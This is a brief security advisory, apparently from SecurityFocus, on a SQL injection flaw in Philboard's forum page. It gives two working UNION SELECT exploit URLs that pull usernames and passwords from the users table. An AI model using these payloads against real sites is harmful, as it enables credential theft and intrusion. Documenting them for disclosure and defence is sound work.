Philboard Philboard_forum.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following exploit URIs are available:

http://www.example.com/philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users
http://www.example.com/philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,11,12,13,14,15,16,17,18+from+users


 

Privacy Statement
Copyright 2010, SecurityFocus